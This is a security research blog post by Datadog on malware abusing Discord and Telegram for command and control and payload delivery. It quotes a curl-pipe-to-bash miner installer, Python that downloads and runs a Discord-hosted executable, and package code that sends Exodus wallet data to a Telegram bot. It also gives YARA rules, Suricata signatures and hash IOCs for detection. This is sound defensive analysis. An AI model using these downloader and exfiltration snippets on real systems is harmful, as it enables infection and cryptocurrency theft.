research

From IRC to Instant Messaging: The Rise of Malware Communication via Chat Platforms

January 10, 2024

From Irc To Instant Messaging: The Rise Of Malware Communication Via Chat Platforms

Key points

  • The Datadog Security Research team has observed numerous malware families leveraging chat platforms for malicious purposes.
  • Malware delivery is evolving from traditional server-based methods and command and control communication to chat platform-based methods.
  • It is difficult to counter this trend due to the necessity of chat platforms in many business operations.

Introduction

Threat actors are increasingly using chat platforms for covert operations. Previously, IRC was the primary choice for command and control (C2) servers in chat platforms, as seen with malware like Back Orifice, Agobot, and SDBot. However, more and more malware families are using chat services like Discord and Telegram for communication and payload delivery. These platforms offer reliable, covert channels for malicious activities.

Evolution of tactics

Traditionally, threat actors have employed direct server downloads for malware deployment and distribution, often using sites like transfer.sh, compromised websites, or virtual private servers (VPS). For C2 communication, they have relied on obfuscation, encryption, or a proprietary C2 protocol. However, this approach poses growing challenges for threat actors: Hosting providers have become more vigilant against malicious content, and intrusion detection systems (IDS) have improved in detecting encrypted or obfuscated C2 traffic.

curl -Lk https://transfer.sh/L6tpcXqySW/setup_xmrigCC.sh | bash

As such, it has become increasingly attractive for threat actors to migrate malware payload delivery and C2 traffic to chat platforms, which inherently possess network encryption, scalability, and resilience. This approach also removes the burden of maintaining threat actor infrastructure.

Securing your systems against malware distribution on chat platforms can be difficult. Not every security organization has the capacity or willingness to decrypt network traffic. Furthermore, blocking traffic to domains like api.telegram[.]org, discord[.]com, or cdn.discordapp[.]com could be impractical—the needs of enterprise environments differ greatly, and many organizations rely on these services for valid reasons. Additionally, the level of resources that chat platforms should allocate to monitoring and curbing abuse remains a subject of debate in the industry.

Malicious payload download from Discord
Malicious payload download from Discord (click to enlarge)

Chat platform usage by threat actors

Threat actors’ adoption of chat platforms for operations, particularly for C2 and payload delivery, marks a strategic shift in adversary methodologies.

The Malicious Software Packages Dataset, maintained by Datadog through contributions from our GuardDog project, has identified a significant number of malicious PyPI packages across the internet, including in chat platforms. Analysis of these packages reveals a notable pattern: approximately 15.7 percent of the 1,397 identified malicious packages are using chat room platforms for C2 services or payload delivery. This underscores threat actors’ increasing reliance on these platforms for executing operations.

Here are several techniques we have observed threat actors using for malware activities, as well as some real-world examples we uncovered in our research.

Supply chain attacks

Malicious software packages are a common method for threat actors to launch supply chain attacks, particularly by mimicking well-known or commonly used legitimate packages. Now, threat actors are leveraging chat platforms as a tool for these kinds of threats.

Example 1: numpy-selenium PyPI package

The package numpy-selenium, identified in our dataset, is a malicious typosquatting attempt masquerading as a legitimate package. Upon execution, it initiates a subprocess and downloads a malicious binary from cdn.discordapp[.]com. This activity highlights threat actors’ sophistication in deploying seemingly legitimate packages for malicious purposes.

import requests
import tempfile
import subprocess

url = 'https://cdn.discordapp.com/attachments/1109115014054416495/1109465188433936425/Windows.exe'
response = requests.get(url)
with tempfile.NamedTemporaryFile(delete=False) as tmp_file:
    tmp_file.write(response.content)
    exe_path = tmp_file.name

subprocess.call([exe_path])

Example 2: parseweb PyPI package

In a recent case, a widely used Python package colorama was mimicked by a malicious package named parseweb. Upon execution, this deceptive package actively searches the user's workstation for the cryptocurrency wallet application "Exodus". If Exodus is detected, the malicious package starts an exfiltration attempt, sending the wallet data to a Telegram channel through a POST request to api.telegram[.]org.

username = getpass.getuser()
TOKEN = "5711014217:AAGm[redacted]"
chat_id = "-690567594"
path = "C:\\Users\\" + username + "\\appdata\\roaming\\exodus\\"
zip = "C:\\Users\\" + username + "\\appdata\\roaming\\" + username+ "-exodus.zip"
passphrase = "C:\\Users\\" + username + "\\appdata\\roaming\\exodus\\exodus.wallet\\passphrase.json"
twofactor = "C:\\Users\\" + username + "\\appdata\\roaming\\exodus\\exodus.wallet\\twofactor.seco"

message = "[🧟] +1 Wallet Exodus from " + username +" %FLAG%\n"
exodus_exist = False
if os.path.exists(path): # (snipped):
    exodus_exist = True
    # ...

if exodus_exist:
    # editor’s note: exfiltrates sensitive information 
    requests.post(f'https://api.telegram.org/bot{TOKEN}/sendMessage', json={
        'chat_id': chat_id, 
        'text': message 
    })

Command and control (C2)

As discussed above, C2 is one of the more widespread uses for chat platforms among threat actors. Here are several examples we documented in our research.

Example 1: VBA Stealer

In a recent instance, a variant of VBA Stealer malware was identified utilizing Telegram for C2 communications. This adaptation demonstrates threat actors’ flexibility in integrating modern communication tools into their arsenals.

VBA Stealer
VBA Stealer (click to enlarge)

VirusTotal

Example 2: zgRAT

Recent observations indicate that prominent threat groups involved with the zgRAT and Agent Tesla malware families have started using chat platforms as well. These groups have begun integrating functionalities for C2 within .NET frameworks.

zgRAT variant
zgRAT variant (click to enlarge)

VirusTotal

Example 3: Cryptocurrency miner

It's clear that Windows systems are not the sole focus of the rise in chat platform abuse. Threat actors involved in cryptocurrency mining are also adopting new techniques for covert communication. We've identified a Linux ELF binary that creates a Bash subprocess and employs a curl POST request for exfiltrating reconnaissance information from the infected host.

Linux cryptocurrency miner
Linux cryptocurrency miner (click to enlarge)

VirusTotal

Payload delivery

In addition to using chat room services for C2, threat actors are also exploiting these platforms for payload delivery, typically by hosting malicious payloads as public attachments on chat platforms. After initial access and execution, a stager will download second-stage payloads from chat services. This method's effectiveness lies in the low likelihood of chat platform domains being blocked and the cost-free hosting they provide. Creating a Discord server and attaching a public payload is a simple yet effective strategy for threat actors. This ease of operation and the inherent trust in these platforms present significant challenges.

Example 1: VBS stager

A recent stager written in VBScript (VBS) initializes a Windows Script Host (WSH) object to execute system commands, retrieves the user's AppData path, and constructs a command to silently download a PowerShell script from cdn.discordapp[.]com, saving it with the name rr.ps1 in the AppData directory. The script execution is then delayed for three seconds.

Malicious VBScript stager
Malicious VBScript stager (click to enlarge)

VirusTotal

Example 2: Gafgyt malware

A recent bash script designed to download different payloads from `cdn[.]discordapp[.]com``, intended for various system architectures. It changes directories to several common Linux paths, attempts to fetch and grant execution permissions to the downloaded files (named after their respective architectures like arm4, arm6, arm7, x86, etc.), and then removes the files. This reflects the Gafgyt malware family's rapid tactical adaptation, as seen in mid-October 2023.

Gafgyt stager
Gafgyt stager (click to enlarge)

VirusTotal

How Datadog can help

Datadog Cloud Security Management (CSM) contains out-of-the-box rules to identify workloads communicating with chat platforms.

Additionally, we recommend proactively blocking chat platform domains in sensitive production environments.

Community solutions

In early November, Bleeping Computer reported that Discord is planning to transition to temporary links for content shared outside the application. This move reflects the increasing prevalence of threat actors leveraging chat platforms for payload delivery.

To address the rise of chat platforms like Discord and Telegram for C2 communication and payload delivery by malicious actors, Datadog has developed detection rules for open source tools like YARA and Suricata. Here’s a look at the resources we’ve created for these solutions to help you identify and mitigate threats leveraging chat services.

YARA rules

rule Discord_Attachment_Suspicious_Activity {
    meta:
        description = "Detects potentially malicious activity involving Discord attachments, including executables and encoded URLs."
        author = "Modified by Andy Giron Datadog"
        original_authors = "Florian Roth (Nextron Systems)"
        date = "12/01/23"
    strings:
        $discord_url = "https://cdn.discordapp.com/attachments/" ascii wide
        $string_base64 = "Y2RuLmRpc2NvcmRhcHAuY29tL2F0dGFjaG1lbnRz" ascii wide
        $string_hex = "63646E2E646973636F72646170702E636F6D2F6174746163686F6E7473" ascii wide
        $reversed_str = "stnemhcatta/moc.ppadrocsid.ndc" ascii wide
    condition:
        filesize < 5000KB and (1 of them)
}
rule Telegram_URL_Encodings {
    meta:
        description = "Detects various encoded forms of Telegram URLs, indicative of potential malicious activity."
        author = "Andy Giron Datadog"
        date = "12/01/23"
    strings:
        $telegram_url = "https://api.telegram.org/" ascii wide
        $string_base64 = "YXBpLnRlbGVncmFtLm9yZwo=" ascii wide
        $string_hex = "6170692E74656C656772616D2E6F72672F" ascii wide
        $reversed_str = "moc.margelet.ipa" ascii wide
    condition:
        1 of them
}
rule Discord_URL_Encodings {
    meta:
        description = "Detects various encoded forms of Discord URLs, indicative of potential malicious activity."
        author = "Andy Giron Datadog"
        reference = "12/01/23"
        date = "12/01/23"
    strings:
        $discord_url = "https://discord.com/" ascii wide
        $string_base64 = "aHR0cHM6Ly9kaXNjb3JkLmNvbS8=" ascii wide
        $string_hex = "68747470733a2f2f646973636f72642e636f6d2f" ascii wide
        $reversed_str = "moc.drocsid//:sptth" ascii wide
    condition:
        1 of them
}

Suricata signatures

alert http any any -> any any (msg:"Telegram API Access"; flow:established,to_server; content:"api.telegram.org"; http_host; classtype:trojan-activity;)
alert http any any -> any any (msg:"Discord CDN Access"; flow:established,to_server; content:"cdn.discordapp.com"; http_host; classtype:trojan-activity;)

Indicators of compromise (IOCs)

The following hashes are indicators of compromise (IOCs). These IOCs are SHA-256 hashes of malicious files we identified in our research. To detect a potential compromise, security practitioners and system administrators can scan their environments for these hashes.

28182e76e4f4e684c08807af159ed5157ad1ea252efa46cfcc5d6feef64bb3c9
45dc4518fbf43bf4611446159f72cdbc37641707bb924bd2a52644a3af5bab76
05d09e5db6a3a784e8ff9df97e38e7a0c73d016d6dcaf74e106647a9cdaf2bd4
59eda1c77195ca2bfc6309ca527448e852002734796f0f143577cda97e147c15
fe6383138be7ff8e8cd3ff84bc5a0ac16439e345e09495b5a06a259f11fafab6

Did you find this article helpful?

Subscribe to the Datadog Security Digest

Get Security Labs posts, insights from the cloud security community, and the latest Datadog security features delivered to your inbox monthly. No spam.

Related Content